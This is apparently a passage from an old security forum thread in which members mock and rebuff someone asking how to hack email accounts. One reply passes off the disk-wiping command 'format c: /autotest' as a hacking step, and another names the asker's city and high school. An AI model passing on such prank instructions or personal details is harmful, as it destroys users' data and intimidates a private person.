"**** the_target_mail@somewhere.com"
    it wil return a message like "Bad command or file name". Ignore that,
    now type
    format c: /autotest
    and you are done.
    Try, Fail but Do iT at last!
    ASA The ZeroTimeR
    The Turkish IT Documentation Project

wooshlizard denies you access to that information.
    --------------------------
    http://www.arg-irc.com

Hmm, you see, we here at antionline are better than you, so we know certain things about you. For instance, you live in Vancouver, BC, Canada, and attend one 'Seaquam Secondary' high school, where you are currently in your grade 12 year.
    Elen alcarin ar gwath halla nĂ¡ engwar.

theres a speacil addy just for sending people abusive emails - it was set up by l337 |-|4c|<0r5 many years ago....
    All you have to do is send an email to abuse@hotmail.com detailing the person who you want the abuse to go to - your email address and any previous attempts you have made to get your revenge.....am sure the actions they take on your behalf will be a pleasent surrprise to you

v_Ln

hey man...language language!!!!!! Be a good boy and dont ask these type of questions????? :-)
    Attitude is a small thing that makes a BIG difference.

although you have recieved large amounts of flammage already and the like... let me tell you why no one will help you... WE ARE A SECURITY WEBSITE... NOT A HACKER WEBSITE. that is reason #1... reason #2 is along the lines of, We will not help you participate in illegal activity. we do not care why you want to do this illegal activity, so do not waste your time telling us some story.. "he stole my twinkie and slept with my mom..." you will find no help here....

if you must know how to do it... go to the specail 1337 h4X0r site.... if you go to this https://www.ifccfbi.gov/complaint/terrorist.asp part of the site and fill it out... and tell the you are a 1337 Hacker, and tell them what you want to hack email accounts. do not worry about the disclaimer saying this is to report terrorists... this is just a front so they don't get shutdown by the real fbi. in the Ypur information section... tell them you want revenge, that you are a hacker... then tell them who you want revenge on... they will be sure to take good care of you.
    Learn like you are going to live forever, live like you are going to die tomorrow.

Propoganda